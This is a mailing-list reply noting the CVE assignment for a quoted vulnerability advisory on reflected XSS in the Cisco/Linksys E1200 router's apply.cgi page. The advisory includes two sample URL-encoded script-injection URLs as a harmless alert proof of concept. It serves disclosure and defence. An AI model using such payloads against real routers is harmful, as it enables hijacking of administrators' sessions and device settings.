[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: Cisco/Linksys E1200 N300 Reflected XSS



Mitre has assigned the following CVE for this issue:

CVE-2013-2679

On Mon, Apr 29, 2013 at 12:27 AM, Carl Benedict
<theinfinitenigma@xxxxxxxxx> wrote:
> Summary
> --------------------
> Software  : Cisco/Linksys Router OS
> Hardware : E1200 N300 (others currently untested)
> Version   : 2.0.04 (others currently untested)
> Website   : http://www.linksys.com
> Issue     :  Reflected XSS
> Severity  : Medium
> Researcher: Carl Benedict (theinfinitenigma)
>
> Product Description
> --------------------
> The Cisco/Linksys E1200 N300 is a consumer-grade router, wireless access 
> point, and 10/100 switch.
>
> Details
> --------------------
> The apply.cgi page, which backs all HTML forms on the device, is vulnerable 
> to reflected XSS via the 'submit_button' parameter. The vulnerability is 
> caused due to a lack of input validation and poor/missing server side 
> validation checks. This attack requires an authenticated session. This 
> application uses HTTP basic authentication. Because of this, there is no 
> session, which increases the likelihood of this attack being successful.
>
> Sample URL #1 (HTTP GET request):
>
> http://192.168.1.1/apply.cgi?submit_button=%27%3b%20%3C%2fscript%3E%3Cscript%3Ealert%281%29%3C%2fscript%3E%20%27
>
> Sample URL #2 (HTTP GET request):
>
> http://192.168.1.1/apply.cgi?submit_button=index%27%3b%20%3c%2f%73%63%72%69%70%74%3e%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%31%29%3c%2f%73%63%72%69%70%74%3e%20%27&change_action=&submit_type=&action=Apply&now_proto=dhcp&daylight_time=1&switch_mode=0&hnap_devicename=Cisco10002&need_reboot=0&user_language=&wait_time=0&dhcp_start=100&dhcp_start_conflict=0&lan_ipaddr=4&ppp_demand_pppoe=9&ppp_demand_pptp=9&ppp_demand_l2tp=9&ppp_demand_hb=9&wan_ipv6_proto=dhcp-tunnel&detect_lang=EN&wan_proto=dhcp&wan_hostname=&wan_domain=&mtu_enable=0&lan_ipaddr_0=192&lan_ipaddr_1=168&lan_ipaddr_2=1&lan_ipaddr_3=1&lan_netmask=255.255.255.0&machine_name=Cisco10002&lan_proto=dhcp&dhcp_check=&dhcp_start_tmp=100&dhcp_num=50&dhcp_lease=0&wan_dns=4&wan_dns0_0=0&wan_dns0_1=0&wan_dns0_2=0&wan_dns0_3=0&wan_dns1_0=0&wan_dns1_1=0&wan_dns1_2=0&wan_dns1_3=0&wan_dns2_0=0&wan_dns2_1=0&wan_dns2_2=0&wan_dns2_3=0&wan_wins=4&wan_wins_0=0&wan_wins_1=0&wan_wins_2=0&wan_wins_3=0&time_zone=-08+1+1&_daylight_time=1
>
> History
> --------------------
> 04/26/2013 : Discovery
> 04/27/2013 : Advisory released
>
>
> --
> ∞



-- 
∞